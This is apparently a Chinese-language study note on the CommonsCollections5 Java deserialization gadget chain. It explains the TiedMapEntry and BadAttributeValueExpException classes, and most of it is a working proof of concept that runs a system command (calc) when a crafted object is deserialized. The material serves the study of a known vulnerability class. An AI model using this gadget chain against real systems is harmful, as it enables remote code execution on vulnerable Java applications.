jdk暂无限制
CommonsCollections 3.1 - 3.2.1

这里使用了cc1的前半段,先看cc5中出现的两个新类

TiedMapEntry

这个类主要用到 getValue()toString(),看到 getValue() 应该就知道什么意思了,cc1的 LazyMap
image.png

BadAttributeValueExpException

BadAttributeValueExpException的构造函数调用了toString()
image.png

poc

  1. package com.yq1ng.cc5;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.map.LazyMap;
  8. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  10. import javax.management.BadAttributeValueExpException;
  11. import java.io.FileInputStream;
  12. import java.io.FileOutputStream;
  13. import java.io.ObjectInputStream;
  14. import java.io.ObjectOutputStream;
  15. import java.lang.reflect.Field;
  16. import java.util.HashMap;
  18. /**
  19.  * @author ying
  20.  * @Description
  21.  * @create 2021-11-23 17:04
  22.  */
  24. public class cc5 {
  25.     public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
  26.         ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
  27.                 new ConstantTransformer(Runtime.class),
  28.                 new InvokerTransformer("getMethod", new Class[] {
  29.                         String.class, Class[].class }, new Object[] {
  30.                         "getRuntime", new Class[0] }),
  31.                 new InvokerTransformer("invoke", new Class[] {
  32.                         Object.class, Object[].class }, new Object[] {
  33.                         null, new Object[0] }),
  34.                 new InvokerTransformer("exec",
  35.                         new Class[] { String.class }, new Object[]{"calc"})});
  37.         HashMap innermap = new HashMap();
  38.         LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
  40.         TiedMapEntry tiedmap = new TiedMapEntry(map,123);
  41.         BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
  42.         //    反射将恶意TiedMapEntry塞进去
  43.         Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
  44.         val.setAccessible(true);
  45.         val.set(poc,tiedmap);
  47.         try{
  48.             ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc5"));
  49.             outputStream.writeObject(poc);
  50.             outputStream.close();
  52.             ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc5"));
  53.             inputStream.readObject();
  54.         }catch(Exception e){
  55.             e.printStackTrace();
  56.         }
  57.     }
  58. }

image.png